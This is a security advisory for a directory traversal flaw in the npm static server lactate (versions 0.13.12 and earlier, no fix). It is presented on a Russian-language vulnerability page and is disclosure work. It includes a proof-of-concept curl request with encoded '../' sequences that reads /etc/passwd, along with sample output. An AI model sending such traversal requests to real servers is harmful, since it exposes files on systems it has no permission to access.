GHSA-68gr-cmcp-g3mj

Опубликовано: 14 июн. 2019

Источник: github

Github: Прошло ревью

CVSS3: 7.5

Описание

Directory Traversal in lactate

A crafted GET request can be leveraged to traverse the directory structure of a host using the lactate web server package, and request arbitrary files outside of the specified web root. This allows for a remote attacker to gain access to arbitrary files on the filesystem that the process has access to read.

Mitigating factors: Only files that the user running lactate has permission to read will be accessible via this vulnerability.

Proof of concept: Please globally install the lactate package and cd to a directory you wish to serve assets from. Next, run lactate -p 8081 to start serving files from this location.

The following cURL request can be used to demonstrate this vulnerability by requesting the target /etc/passwd file:

curl "http://127.0.0.1:8081/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin [...]

Recommendation

As there is currently no fix for this issue selecting an alternative static web server would be the best choice.

Ссылки

Пакеты

Наименование

lactate

npm

Затронутые версииВерсия исправления

<= 0.13.12

Отсутствует

7.5 High

CVSS3

Дефекты

CWE-22

7.5 High

CVSS3

Дефекты

CWE-22